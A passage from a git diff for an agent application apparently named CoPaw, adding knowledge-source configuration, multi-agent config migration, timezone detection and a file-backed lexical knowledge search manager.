"**/*.toml", + "**/*.py", + ], + ) + exclude_globs: List[str] = Field( + default_factory=lambda: [ + ".git/**", + "node_modules/**", + ".venv/**", + "dist/**", + "build/**", + "__pycache__/**", + ], + ) +class KnowledgeAutomationConfig(BaseModel): + """Passive knowledge collection during chat turns.""" + + knowledge_auto_collect_chat_files: bool = Field(default=True) + knowledge_auto_collect_chat_urls: bool = Field(default=True) + knowledge_auto_collect_long_text: bool = Field(default=True) + knowledge_long_text_min_chars: int = Field(default=2000, ge=200, le=20000) + + url_exclude_private_addresses: bool = Field( + default=True, + description="Auto-exclude localhost and private IP/intranet URLs (127.x, 192.168.x, 10.x, etc.)", + ) + url_exclude_token_params: bool = Field( + default=True, + description="Auto-exclude URLs whose query string contains credential params (access_token, api_key, etc.)", + ) + url_exclude_patterns: List[str] = Field( + default_factory=list, + description="Additional URL exclusion patterns; each entry is a URL prefix or glob (e.g. 
'https://hooks.slack.com/')", + ) + + +class KnowledgeConfig(BaseModel): + """Root config for the knowledge layer.""" + + version: int = Field(default=1, ge=1) + enabled: bool = Field(default=False) + engine: Literal["local_lexical"] = Field(default="local_lexical") + graph_query_enabled: bool = Field(default=False) + triplet_search_enabled: bool = Field(default=False) + memify_enabled: bool = Field(default=False) + allow_cypher_query: bool = Field(default=False) + sources: List[KnowledgeSourceSpec] = Field(default_factory=list) + index: KnowledgeIndexConfig = Field(default_factory=KnowledgeIndexConfig) + automation: KnowledgeAutomationConfig = Field( + default_factory=KnowledgeAutomationConfig, + ) class Config(BaseModel): """Root config (config.json).""" @@ -484,9 +1020,18 @@ class Config(BaseModel): tools: ToolsConfig = Field(default_factory=ToolsConfig) last_api: LastApiConfig = LastApiConfig() agents: AgentsConfig = Field(default_factory=AgentsConfig) + knowledge: KnowledgeConfig = Field(default_factory=KnowledgeConfig) + skills_market: SkillsMarketConfig = Field( + default_factory=SkillsMarketConfig, + ) last_dispatch: Optional[LastDispatchConfig] = None security: SecurityConfig = Field(default_factory=SecurityConfig) show_tool_details: bool = True + user_timezone: str = Field( + default_factory=detect_system_timezone, + description="User IANA timezone (e.g. Asia/Shanghai). " + "Defaults to the system timezone.", + ) ChannelConfigUnion = Union[ @@ -501,4 +1046,268 @@ class Config(BaseModel): ConsoleConfig, MatrixConfig, VoiceChannelConfig, + WecomConfig, + XiaoYiConfig, ] + + +# Agent configuration utility functions + + +def load_agent_config(agent_id: str) -> AgentProfileConfig: + """Load agent's complete configuration from workspace/agent.json. 
+ + Args: + agent_id: Agent ID to load + + Returns: + AgentProfileConfig: Complete agent configuration + + Raises: + ValueError: If agent ID not found in root config + """ + from .utils import load_config + + config = load_config() + + if agent_id not in config.agents.profiles: + raise ValueError(f"Agent '{agent_id}' not found in config") + + agent_ref = config.agents.profiles[agent_id] + workspace_dir = Path(agent_ref.workspace_dir).expanduser() + agent_config_path = workspace_dir / "agent.json" + + if not agent_config_path.exists(): + # Fallback: Try to use root config fields for backward compatibility + # This allows downgrade scenarios where agent.json doesn't exist yet + fallback_config = AgentProfileConfig( + id=agent_id, + name=agent_id.title(), + description=f"{agent_id} agent", + workspace_dir=str(workspace_dir), + # Inherit from root config if available (for backward compat) + channels=( + config.channels + if hasattr(config, "channels") and config.channels + else None + ), + mcp=config.mcp if hasattr(config, "mcp") and config.mcp else None, + tools=( + config.tools + if hasattr(config, "tools") and config.tools + else None + ), + security=( + config.security + if hasattr(config, "security") and config.security + else None + ), + # Use agent-specific configs with proper defaults + running=( + config.agents.running + if hasattr(config.agents, "running") and config.agents.running + else AgentsRunningConfig() + ), + llm_routing=( + config.agents.llm_routing + if hasattr(config.agents, "llm_routing") + and config.agents.llm_routing + else AgentsLLMRoutingConfig() + ), + system_prompt_files=( + config.agents.system_prompt_files + if hasattr(config.agents, "system_prompt_files") + and config.agents.system_prompt_files + else ["AGENTS.md", "SOUL.md", "PROFILE.md"] + ), + ) + # Save for future use + save_agent_config(agent_id, fallback_config) + return fallback_config + + with open(agent_config_path, "r", encoding="utf-8") as f: + data = json.load(f) + + # 
Normalize legacy ~/.copaw-bound paths to current WORKING_DIR. + # This keeps COPAW_WORKING_DIR effective even if existing agent.json + # contains older hard-coded paths like "~/.copaw/media". + try: + from .utils import _normalize_working_dir_bound_paths + + data = _normalize_working_dir_bound_paths(data) + except Exception: + pass + + return AgentProfileConfig(**data) + + +def save_agent_config( + agent_id: str, + agent_config: AgentProfileConfig, +) -> None: + """Save agent configuration to workspace/agent.json. + + Args: + agent_id: Agent ID + agent_config: Complete agent configuration to save + + Raises: + ValueError: If agent ID not found in root config + """ + from .utils import load_config + + config = load_config() + + if agent_id not in config.agents.profiles: + raise ValueError(f"Agent '{agent_id}' not found in config") + + agent_ref = config.agents.profiles[agent_id] + workspace_dir = Path(agent_ref.workspace_dir).expanduser() + workspace_dir.mkdir(parents=True, exist_ok=True) + + agent_config_path = workspace_dir / "agent.json" + + with open(agent_config_path, "w", encoding="utf-8") as f: + json.dump( + agent_config.model_dump(exclude_none=True), + f, + ensure_ascii=False, + indent=2, + ) + + +def migrate_legacy_config_to_multi_agent() -> bool: + """Migrate legacy single-agent config to new multi-agent structure. 
+
+    Returns:
+        bool: True if migration was performed, False if already migrated
+    """
+    from .utils import load_config, save_config
+
+    config = load_config()
+
+    # Check if already migrated (new structure has only AgentProfileRef)
+    if "default" in config.agents.profiles:
+        agent_ref = config.agents.profiles["default"]
+        # If it's already an AgentProfileRef, migration is done
+        if isinstance(agent_ref, AgentProfileRef):
+            # Check if default agent config exists
+            workspace_dir = Path(agent_ref.workspace_dir).expanduser()
+            agent_config_path = workspace_dir / "agent.json"
+            if agent_config_path.exists():
+                return False  # Already migrated
+
+    # Perform migration
+    print("Migrating legacy config to multi-agent structure...")
+
+    # Extract legacy agent configuration
+    legacy_agents = config.agents
+
+    # Create default agent workspace
+    default_workspace = Path(f"{WORKING_DIR}/workspaces/default").expanduser()
+    default_workspace.mkdir(parents=True, exist_ok=True)
+
+    # Create default agent configuration from legacy settings
+    default_agent_config = AgentProfileConfig(
+        id="default",
+        name="Default Agent",
+        description="Default CoPaw agent",
+        workspace_dir=str(default_workspace),
+        channels=config.channels if config.channels else None,
+        mcp=config.mcp if config.mcp else None,
+        heartbeat=(
+            legacy_agents.defaults.heartbeat
+            if legacy_agents.defaults
+            else None
+        ),
+        running=(
+            legacy_agents.running
+            if legacy_agents.running
+            else AgentsRunningConfig()
+        ),
+        llm_routing=(
+            legacy_agents.llm_routing
+            if legacy_agents.llm_routing
+            else AgentsLLMRoutingConfig()
+        ),
+        system_prompt_files=(
+            legacy_agents.system_prompt_files
+            if legacy_agents.system_prompt_files
+            else ["AGENTS.md", "SOUL.md", "PROFILE.md"]
+        ),
+        tools=config.tools if config.tools else None,
+        security=config.security if config.security else None,
+    )
+
+    # Save default agent configuration to workspace
+    agent_config_path = default_workspace / "agent.json"
+    with open(agent_config_path, "w",
encoding="utf-8") as f:
+        json.dump(
+            default_agent_config.model_dump(exclude_none=True),
+            f,
+            ensure_ascii=False,
+            indent=2,
+        )
+
+    # Migrate existing workspace files from legacy default working dir.
+    # When COPAW_WORKING_DIR is customized, historical data may still exist
+    # under "~/.copaw".
+    old_workspace = Path("~/.copaw").expanduser().resolve()
+
+    # Copy sessions, memory, and other workspace files
+    # (originals are left in place for old versions)
+    for item_name in ["sessions", "memory", "jobs.json"]:
+        old_path = old_workspace / item_name
+        if old_path.exists():
+            new_path = default_workspace / item_name
+            if not new_path.exists():
+                import shutil
+
+                if old_path.is_dir():
+                    shutil.copytree(old_path, new_path)
+                else:
+                    shutil.copy2(old_path, new_path)
+                print(f"  Migrated {item_name} to default workspace")
+
+    # Copy markdown files (AGENTS.md, SOUL.md, PROFILE.md)
+    for md_file in ["AGENTS.md", "SOUL.md", "PROFILE.md"]:
+        old_md = old_workspace / md_file
+        if old_md.exists():
+            new_md = default_workspace / md_file
+            if not new_md.exists():
+                import shutil
+
+                shutil.copy2(old_md, new_md)
+                print(f"  Migrated {md_file} to default workspace")
+
+    # Update root config.json to new structure
+    # CRITICAL: Preserve legacy agent fields for downgrade compatibility
+    config.agents = AgentsConfig(
+        active_agent="default",
+        profiles={
+            "default": AgentProfileRef(
+                id="default",
+                workspace_dir=str(default_workspace),
+            ),
+        },
+        # Preserve legacy fields with values from migrated agent config
+        running=default_agent_config.running,
+        llm_routing=default_agent_config.llm_routing,
+        language=(
+            default_agent_config.language
+            if hasattr(default_agent_config, "language")
+            else "zh"
+        ),
+        system_prompt_files=default_agent_config.system_prompt_files,
+    )
+
+    # IMPORTANT: Keep channels, mcp, tools, security in root config for
+    # backward compatibility. Do NOT clear these fields.
+    # Old versions expect these fields to exist with valid values.
+ + save_config(config) + + print("Migration completed successfully!") + print(f" Default agent workspace: {default_workspace}") + print(f" Default agent config: {agent_config_path}") + + return True diff --git a/src/copaw/config/context.py b/src/copaw/config/context.py new file mode 100644 index 000000000..e10368127 --- /dev/null +++ b/src/copaw/config/context.py @@ -0,0 +1,33 @@ +# -*- coding: utf-8 -*- +"""Context variable for agent workspace directory. + +This module provides a context variable to pass the agent's workspace +directory to tool functions, allowing them to resolve relative paths +correctly in a multi-agent environment. +""" +from contextvars import ContextVar +from pathlib import Path + +# Context variable to store the current agent's workspace directory +current_workspace_dir: ContextVar[Path | None] = ContextVar( + "current_workspace_dir", + default=None, +) + + +def get_current_workspace_dir() -> Path | None: + """Get the current agent's workspace directory from context. + + Returns: + Path to the current agent's workspace directory, or None if not set. + """ + return current_workspace_dir.get() + + +def set_current_workspace_dir(workspace_dir: Path | None) -> None: + """Set the current agent's workspace directory in context. + + Args: + workspace_dir: Path to the agent's workspace directory. + """ + current_workspace_dir.set(workspace_dir) diff --git a/src/copaw/config/timezone.py b/src/copaw/config/timezone.py new file mode 100644 index 000000000..635201295 --- /dev/null +++ b/src/copaw/config/timezone.py @@ -0,0 +1,47 @@ +# -*- coding: utf-8 -*- +"""Detect the system IANA timezone. + +Kept in its own module to avoid circular imports between config.py and +utils.py. Uses only the standard library; always returns a valid string +(falls back to ``"UTC"``). 
+""" + +from __future__ import annotations + +import os +from datetime import datetime, timezone + + +def detect_system_timezone() -> str: + """Return the IANA timezone name of the host, falling back to ``UTC``.""" + try: + local_name = ( + datetime.now(timezone.utc) + .astimezone() + .tzinfo.tzname(None) # type: ignore[union-attr] + ) + if local_name and "/" in local_name: + return local_name + except Exception: + pass + + tz_env = os.environ.get("TZ", "") + if tz_env and "/" in tz_env: + return tz_env + + try: + with open("/etc/timezone", encoding="utf-8") as f: + name = f.read().strip() + if name and "/" in name: + return name + except OSError: + pass + + try: + link = os.readlink("/etc/localtime") + if "zoneinfo/" in link: + return link.split("zoneinfo/", 1)[1] + except OSError: + pass + + return "UTC" diff --git a/src/copaw/config/utils.py b/src/copaw/config/utils.py index e2fb3fe97..76cbb3ae6 100644 --- a/src/copaw/config/utils.py +++ b/src/copaw/config/utils.py @@ -6,6 +6,7 @@ import plistlib import subprocess import sys +from datetime import UTC, datetime from pathlib import Path from typing import Optional, Tuple @@ -17,7 +18,50 @@ RUNNING_IN_CONTAINER, WORKING_DIR, ) -from .config import Config, HeartbeatConfig, LastApiConfig, LastDispatchConfig +from .config import ( + Config, + HeartbeatConfig, + LastApiConfig, + LastDispatchConfig, + load_agent_config, + save_agent_config, +) + + +def _normalize_working_dir_bound_paths(data: object) -> object: + """Normalize legacy ~/.copaw-bound paths to current WORKING_DIR. + + This keeps COPAW_WORKING_DIR effective even if user config files contain + older hard-coded paths like "~/.copaw/media" or + "/Users/x/.copaw/workspaces/...". + Only rewrites known working-dir-bound keys. 
+ """ + legacy_root_tilde = "~/.copaw" + legacy_root_abs = str(Path(legacy_root_tilde).expanduser().resolve()) + new_root_abs = str(WORKING_DIR) + + def _rewrite_path_value(v: object) -> object: + if not isinstance(v, str) or not v: + return v + if v.startswith(legacy_root_tilde): + return new_root_abs + v[len(legacy_root_tilde) :] + if v.startswith(legacy_root_abs): + return new_root_abs + v[len(legacy_root_abs) :] + return v + + def _walk(obj: object, key: str | None = None) -> object: + if isinstance(obj, dict): + out: dict = {} + for k, v in obj.items(): + out[k] = _walk(v, str(k)) + return out + if isinstance(obj, list): + return [_walk(x, key) for x in obj] + if key in {"workspace_dir", "media_dir"}: + return _rewrite_path_value(obj) + return obj + + return _walk(data, None) def _discover_system_chromium_path() -> Optional[str]: @@ -336,6 +380,7 @@ def load_config(config_path: Optional[Path] = None) -> Config: return Config() with open(config_path, "r", encoding="utf-8") as file: data = json.load(file) + data = _normalize_working_dir_bound_paths(data) # Backward compat: top-level last_api_host / last_api_port -> last_api if "last_api_host" in data or "last_api_port" in data: la = data.setdefault("last_api", {}) @@ -343,6 +388,10 @@ def load_config(config_path: Optional[Path] = None) -> Config: la["host"] = data.get("last_api_host") if "port" not in la and "last_api_port" in data: la["port"] = data.get("last_api_port") + # Backward compat: knowledge.engine object -> literal enum string + knowledge = data.get("knowledge") + if isinstance(knowledge, dict) and isinstance(knowledge.get("engine"), dict): + knowledge["engine"] = "local_lexical" return Config.model_validate(data) @@ -360,20 +409,66 @@ def save_config(config: Config, config_path: Optional[Path] = None) -> None: ) -def get_heartbeat_config() -> HeartbeatConfig: - """Return effective heartbeat config (from file or default 30m/main).""" +def get_heartbeat_config(agent_id: Optional[str] = None) -> 
HeartbeatConfig: + """Return effective heartbeat config (from agent config or default). + + Args: + agent_id: Agent ID to load config from. If None, tries to load from + root config.agents.defaults (legacy behavior). + + Returns: + HeartbeatConfig: Heartbeat configuration or default. + """ + if agent_id is not None: + try: + agent_config = load_agent_config(agent_id) + hb = agent_config.heartbeat + return hb if hb is not None else HeartbeatConfig() + except Exception: + return HeartbeatConfig() + + # Legacy: try to load from root config config = load_config() + if config.agents.defaults is None: + return HeartbeatConfig() hb = config.agents.defaults.heartbeat return hb if hb is not None else HeartbeatConfig() -def update_last_dispatch(channel: str, user_id: str, session_id: str) -> None: - """Persist last user-reply dispatch target (user send+reply only).""" +def update_last_dispatch( + channel: str, + user_id: str, + session_id: str, + agent_id: Optional[str] = None, +) -> None: + """Persist last user-reply dispatch target (user send+reply only). + + Args: + channel: Channel name + user_id: User ID + session_id: Session ID + agent_id: Agent ID to update. If None, updates root config (legacy). 
+    """
+    if agent_id is not None:
+        try:
+            agent_config = load_agent_config(agent_id)
+            agent_config.last_dispatch = LastDispatchConfig(
+                channel=channel,
+                user_id=user_id,
+                session_id=session_id,
+                dispatched_at=datetime.now(UTC).isoformat(),
+            )
+            save_agent_config(agent_id, agent_config)
+            return
+        except Exception:
+            pass
+
+    # Legacy: update root config
     config = load_config()
     config.last_dispatch = LastDispatchConfig(
         channel=channel,
         user_id=user_id,
         session_id=session_id,
+        dispatched_at=datetime.now(UTC).isoformat(),
     )
     save_config(config)
diff --git a/src/copaw/constant.py b/src/copaw/constant.py
index f0c566cbe..9750d7e33 100644
--- a/src/copaw/constant.py
+++ b/src/copaw/constant.py
@@ -79,6 +79,9 @@ def get_str(env_var: str, default: str = "") -> str:
     .resolve()
 )

+# Default media directory for channels (cross-platform)
+DEFAULT_MEDIA_DIR = WORKING_DIR / "media"
+

 JOBS_FILE = EnvVarLoader.get_str("COPAW_JOBS_FILE", "jobs.json")
 CHATS_FILE = EnvVarLoader.get_str("COPAW_CHATS_FILE", "chats.json")

@@ -95,6 +98,13 @@ def get_str(env_var: str, default: str = "") -> str:
 HEARTBEAT_DEFAULT_TARGET = "main"
 HEARTBEAT_TARGET_LAST = "last"

+# Debug history file for /dump_history and /load_history commands
+DEBUG_HISTORY_FILE = EnvVarLoader.get_str(
+    "COPAW_DEBUG_HISTORY_FILE",
+    "debug_history.jsonl",
+)
+MAX_LOAD_HISTORY_COUNT = 10000
+

 # Env key for app log level (used by CLI and app load for reload child).
LOG_LEVEL_ENV = "COPAW_LOG_LEVEL" @@ -135,13 +145,13 @@ def get_str(env_var: str, default: str = "") -> str: # Local models directory MODELS_DIR = WORKING_DIR / "models" -# Memory compaction configuration MEMORY_COMPACT_KEEP_RECENT = EnvVarLoader.get_int( "COPAW_MEMORY_COMPACT_KEEP_RECENT", 3, min_value=0, ) +# Memory compaction configuration MEMORY_COMPACT_RATIO = EnvVarLoader.get_float( "COPAW_MEMORY_COMPACT_RATIO", 0.7, diff --git a/src/copaw/knowledge/__init__.py b/src/copaw/knowledge/__init__.py new file mode 100644 index 000000000..18c5b5780 --- /dev/null +++ b/src/copaw/knowledge/__init__.py @@ -0,0 +1,6 @@ +# -*- coding: utf-8 -*- + +from .manager import KnowledgeManager +from .graph_ops import GraphOpsManager + +__all__ = ["KnowledgeManager", "GraphOpsManager"] \ No newline at end of file diff --git a/src/copaw/knowledge/graph_ops.py b/src/copaw/knowledge/graph_ops.py new file mode 100644 index 000000000..2d11517d2 --- /dev/null +++ b/src/copaw/knowledge/graph_ops.py @@ -0,0 +1,191 @@ +# -*- coding: utf-8 -*- +"""Bridge layer for graph-oriented knowledge operations. + +This module provides a lightweight manager used by graph tools. It keeps +current MVP behavior compatible with the local lexical engine. 
+""" + +from __future__ import annotations + +import json +import uuid +from dataclasses import dataclass +from datetime import UTC, datetime +from pathlib import Path +from typing import Any + +from ..config.config import KnowledgeConfig +from ..constant import WORKING_DIR +from .manager import KnowledgeManager + + +@dataclass +class GraphOpsResult: + records: list[dict[str, Any]] + summary: str + provenance: dict[str, Any] + warnings: list[str] + + +class GraphOpsManager: + """Graph operation facade for tool-layer usage.""" + + def __init__(self, working_dir: Path | str = WORKING_DIR) -> None: + self.working_dir = Path(working_dir) + self.knowledge_root = self.working_dir / "knowledge" + self.memify_jobs_path = self.knowledge_root / "memify-jobs.json" + + def graph_query( + self, + *, + config: KnowledgeConfig, + query_mode: str, + query_text: str, + dataset_scope: list[str] | None, + top_k: int, + timeout_sec: int, + ) -> GraphOpsResult: + """Run graph-like query over current knowledge backend. + + For MVP local engine, template mode is mapped to existing lexical + retrieval and normalized into graph-like records. 
+ """ + _ = timeout_sec + engine = getattr(config, "engine", "local_lexical") + warnings: list[str] = [] + + if query_mode == "cypher": + return GraphOpsResult( + records=[], + summary="Cypher mode is not available on local_lexical engine.", + provenance={"engine": engine, "dataset_scope": dataset_scope or []}, + warnings=["CYPHER_UNAVAILABLE_ON_LOCAL_ENGINE"], + ) + + manager = KnowledgeManager(self.working_dir) + search_result = manager.search( + query=query_text, + config=config, + limit=max(1, min(top_k, 50)), + ) + records: list[dict[str, Any]] = [] + for hit in search_result.get("hits") or []: + snippet = (hit.get("snippet") or "").strip() + if not snippet: + continue + records.append( + { + "subject": hit.get("source_name") or hit.get("source_id") or "unknown", + "predicate": "mentions", + "object": snippet, + "score": float(hit.get("score", 0) or 0), + "source_id": hit.get("source_id"), + "source_type": hit.get("source_type"), + "document_path": hit.get("document_path"), + "document_title": hit.get("document_title"), + } + ) + + if not records: + warnings.append("NO_GRAPH_RECORDS") + + return GraphOpsResult( + records=records, + summary=f"Returned {len(records)} graph-like records.", + provenance={ + "engine": engine, + "dataset_scope": dataset_scope or [], + "query_mode": query_mode, + }, + warnings=warnings, + ) + + def run_memify( + self, + *, + config: KnowledgeConfig, + pipeline_type: str, + dataset_scope: list[str] | None, + idempotency_key: str, + dry_run: bool, + ) -> dict[str, Any]: + """Create a memify job record. + + The local lexical engine stores a no-op success job so tool contracts + and job observability can be validated for MVP flows. 
+ """ + jobs = self._load_memify_jobs() + + normalized_key = (idempotency_key or "").strip() + if normalized_key: + existing = next( + ( + item + for item in jobs.values() + if item.get("idempotency_key") == normalized_key + ), + None, + ) + if existing is not None: + return { + "accepted": False, + "job_id": existing["job_id"], + "status_url": f"/knowledge/memify/jobs/{existing['job_id']}", + "reason": "IDEMPOTENT_REUSE", + } + + job_id = uuid.uuid4().hex[:12] + now = datetime.now(UTC).isoformat() + engine = getattr(config, "engine", "local_lexical") + + status = "succeeded" + error = None + warnings = ["LOCAL_ENGINE_MEMIFY_NOOP"] + + job_payload = { + "job_id": job_id, + "pipeline_type": pipeline_type, + "dataset_scope": dataset_scope or [], + "idempotency_key": normalized_key, + "dry_run": bool(dry_run), + "status": status, + "progress": 100 if status == "succeeded" else 0, + "estimated_steps": 1, + "started_at": now, + "finished_at": now, + "error": error, + "warnings": warnings, + "engine": engine, + "updated_at": now, + } + jobs[job_id] = job_payload + self._save_memify_jobs(jobs) + + return { + "accepted": True, + "job_id": job_id, + "estimated_steps": 1, + "status_url": f"/knowledge/memify/jobs/{job_id}", + } + + def get_memify_status(self, job_id: str) -> dict[str, Any] | None: + jobs = self._load_memify_jobs() + return jobs.get(job_id) + + def _load_memify_jobs(self) -> dict[str, dict[str, Any]]: + if not self.memify_jobs_path.exists(): + return {} + try: + payload = json.loads(self.memify_jobs_path.read_text(encoding="utf-8")) + except Exception: + return {} + if not isinstance(payload, dict): + return {} + return {str(key): value for key, value in payload.items() if isinstance(value, dict)} + + def _save_memify_jobs(self, jobs: dict[str, dict[str, Any]]) -> None: + self.knowledge_root.mkdir(parents=True, exist_ok=True) + self.memify_jobs_path.write_text( + json.dumps(jobs, ensure_ascii=False, indent=2), + encoding="utf-8", + ) \ No newline at end of 
file diff --git a/src/copaw/knowledge/manager.py b/src/copaw/knowledge/manager.py new file mode 100644 index 000000000..b3e7c6586 --- /dev/null +++ b/src/copaw/knowledge/manager.py @@ -0,0 +1,2457 @@ +# -*- coding: utf-8 -*- +"""File-backed knowledge source indexing and search.""" + +from __future__ import annotations + +import fnmatch +import hashlib +import json +import logging +import re +import shutil +from collections import Counter +from datetime import UTC, datetime, timedelta +from html import unescape +from pathlib import Path +from typing import Any +from urllib.parse import urlparse, parse_qs + +import httpx + +try: + import jieba # type: ignore[import-not-found] +except Exception: # pragma: no cover - optional dependency + jieba = None + +try: + import hanlp # type: ignore[import-not-found] +except Exception: # pragma: no cover - optional dependency + hanlp = None + +from ..constant import CHATS_FILE +from ..config.config import KnowledgeConfig, KnowledgeSourceSpec + +_UNSAFE_FILENAME_RE = re.compile(r'[\\/:*?"<>|]') +_CHAT_URL_RE = re.compile( + r"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()+,;=%-]+", + re.IGNORECASE, +) +_URL_TRAILING_STRIP_CHARS = ".,;:!?)]}\"'`*,。!?;:、)】》〉」』" + +# URL exclusion helpers +_URL_SENSITIVE_PARAMS = frozenset({ + "access_token", "token", "api_key", "apikey", "apitoken", + "secret", "password", "auth", "key", "webhook_token", + "sign", "signature", "hmac", +}) +_PRIVATE_HOST_RE = re.compile( + r"^(" + r"localhost" + r"|127(?:\.\d{1,3}){3}" + r"|0\.0\.0\.0" + r"|10(?:\.\d{1,3}){3}" + r"|172\.(?:1[6-9]|2\d|3[01])(?:\.\d{1,3}){2}" + r"|192\.168(?:\.\d{1,3}){2}" + r"|::1" + r"|\[::1\]" + r")$", + re.IGNORECASE, +) +_TITLE_WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9_-]{2,}|[\u4e00-\u9fff]{2,}") +_TITLE_SENTENCE_SPLIT_RE = re.compile(r"(?<=[。!?.!?])\s+|[\n\r]+") +_TITLE_STOP_WORDS = { + "the", + "and", + "for", + "with", + "this", + "that", + "from", + "into", + "chat", + "auto", + "source", + "message", + "messages", + "knowledge", + 
"data", + "content", + "session", + "用户", + "助手", + "自动", + "来源", + "消息", + "内容", + "知识", + "数据", +} +_SEMANTIC_TOKEN_RE = re.compile(r"[A-Za-z][A-Za-z0-9_-]{2,}|[\u4e00-\u9fff]{2,}") +_SEMANTIC_STOP_WORDS = { + *_TITLE_STOP_WORDS, + "is", + "are", + "was", + "were", + "be", + "to", + "of", + "in", + "on", + "at", + "by", + "or", + "as", + "it", + "an", + "a", + "关键词", + "关键", + "词", +} +_KEYWORD_DEFAULT_TOP_N = 3 +_TEXTUAL_CONTENT_TYPE_MARKERS = ( + "text/", + "application/json", + "application/xml", + "application/xhtml+xml", + "application/javascript", + "application/x-javascript", + "application/ld+json", +) + +logger = logging.getLogger(__name__) +_AUTO_COLLECT_URL_MIN_CONTENT_CHARS = 1000 + + +def _sanitize_filename(name: str) -> str: + return _UNSAFE_FILENAME_RE.sub("--", name) + + +class KnowledgeManager: + """Manage knowledge source indexing within the CoPaw working directory.""" + + def __init__(self, working_dir: str | Path): + self.working_dir = Path(working_dir).expanduser().resolve() + self.root_dir = self.working_dir / "knowledge" + self.sources_dir = self.root_dir / "sources" + self.catalog_path = self.root_dir / "catalog.json" + self.uploads_dir = self.root_dir / "uploads" + self.backfill_state_path = self.root_dir / "history-backfill-state.json" + self.backfill_progress_path = self.root_dir / "history-backfill-progress.json" + self.remote_dir = self.uploads_dir / "remote" + self.remote_blob_dir = self.remote_dir / "blobs" + self.remote_meta_dir = self.remote_dir / "url-meta" + legacy_index_dir = self.root_dir / "indexes" + if legacy_index_dir.exists(): + shutil.rmtree(legacy_index_dir, ignore_errors=True) + self.sources_dir.mkdir(parents=True, exist_ok=True) + self.uploads_dir.mkdir(parents=True, exist_ok=True) + self.remote_blob_dir.mkdir(parents=True, exist_ok=True) + self.remote_meta_dir.mkdir(parents=True, exist_ok=True) + + def list_sources(self, config: KnowledgeConfig) -> list[dict[str, Any]]: + """Return configured sources with index 
metadata when available.""" + results: list[dict[str, Any]] = [] + for source in config.sources: + payload = source.model_dump(mode="json") + processed = self._process_source_knowledge(source, config) + payload["subject"] = processed.get("subject") or source.name + payload["summary"] = processed.get("summary") or source.summary + payload["keywords"] = processed.get("keywords") or [] + payload["status"] = self.get_source_status(source.id, source) + results.append(payload) + return results + + def normalize_source_name( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> KnowledgeSourceSpec: + """Return a source with auto-generated name derived from its content/location.""" + return self._source_with_auto_name(source, config) + + def get_source_status( + self, + source_id: str, + source: KnowledgeSourceSpec | None = None, + ) -> dict[str, Any]: + """Return persisted index metadata for a source.""" + source_index_path = self._source_index_path(source_id) + if not source_index_path.exists(): + status = { + "indexed": False, + "indexed_at": None, + "document_count": 0, + "chunk_count": 0, + "error": None, + } + if source is not None: + status.update(self._remote_source_status(source)) + return status + + payload = self._load_json(source_index_path) + status = { + "indexed": True, + "indexed_at": payload.get("indexed_at"), + "document_count": payload.get("document_count", 0), + "chunk_count": payload.get("chunk_count", 0), + "error": payload.get("error"), + } + if source is not None: + status.update(self._remote_source_status(source)) + return status + + def index_source( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Index a single source into chunked JSON files.""" + documents = self._load_documents(source, config) + chunks = self._chunk_documents( + documents, + self._resolve_chunk_size(config, running_config), + ) + payload = { + "source": 
source.model_dump(mode="json"), + "indexed_at": datetime.now(UTC).isoformat(), + "document_count": len(documents), + "chunk_count": len(chunks), + "error": None, + "chunks": chunks, + } + self._write_source_storage(source, payload, documents) + return { + "source_id": source.id, + "document_count": len(documents), + "chunk_count": len(chunks), + "indexed_at": payload["indexed_at"], + } + + def index_all( + self, + config: KnowledgeConfig, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Index all enabled sources.""" + results = [] + for source in config.sources: + if not source.enabled: + continue + results.append(self.index_source(source, config, running_config)) + return { + "indexed_sources": len(results), + "results": results, + } + + def delete_index(self, source_id: str) -> None: + """Delete persisted index for a source.""" + source_dir = self._source_dir(source_id) + if source_dir.exists(): + shutil.rmtree(source_dir, ignore_errors=True) + + def clear_knowledge(self, config: KnowledgeConfig, *, remove_sources: bool = True) -> dict[str, Any]: + """Clear persisted knowledge data and optionally reset configured sources.""" + source_count = len(config.sources) + cleared_indexes = 0 + if self.sources_dir.exists(): + cleared_indexes = len(list(self.sources_dir.glob("*/index.json"))) + + if self.root_dir.exists(): + shutil.rmtree(self.root_dir, ignore_errors=True) + + # Recreate expected directory structure after cleanup. 
+ self.sources_dir.mkdir(parents=True, exist_ok=True) + self.uploads_dir.mkdir(parents=True, exist_ok=True) + self.remote_blob_dir.mkdir(parents=True, exist_ok=True) + self.remote_meta_dir.mkdir(parents=True, exist_ok=True) + + if remove_sources: + config.sources = [] + + return { + "cleared": True, + "cleared_indexes": cleared_indexes, + "cleared_sources": source_count if remove_sources else 0, + "removed_source_configs": bool(remove_sources), + } + + def search( + self, + query: str, + config: KnowledgeConfig, + limit: int = 10, + source_ids: list[str] | None = None, + source_types: list[str] | None = None, + ) -> dict[str, Any]: + """Search indexed chunks with a lightweight lexical scorer.""" + source_map = {source.id: source for source in config.sources} + terms = [term for term in re.findall(r"\w+", query.lower()) if term] + if not terms: + return {"query": query, "hits": []} + + hits: list[dict[str, Any]] = [] + for source in config.sources: + if source_ids and source.id not in source_ids: + continue + if source_types and source.type not in source_types: + continue + payload = self._load_index_payload(source.id) + if payload is None: + continue + for chunk in payload.get("chunks", []): + score = self._score_chunk(chunk.get("text", ""), terms) + if score <= 0: + continue + hits.append( + { + "source_id": source.id, + "source_name": source_map[source.id].name, + "source_type": source.type, + "document_path": chunk.get("document_path"), + "document_title": chunk.get("document_title"), + "score": score, + "snippet": self._build_snippet( + chunk.get("text", ""), + terms, + ), + }, + ) + + hits.sort(key=lambda item: item["score"], reverse=True) + return {"query": query, "hits": hits[:limit]} + + def get_source_documents(self, source_id: str) -> dict[str, Any]: + """Return the indexed documents for a source, merged by document path.""" + payload = self._load_index_payload(source_id) + if payload is None: + return {"indexed": False, "documents": []} + chunks = 
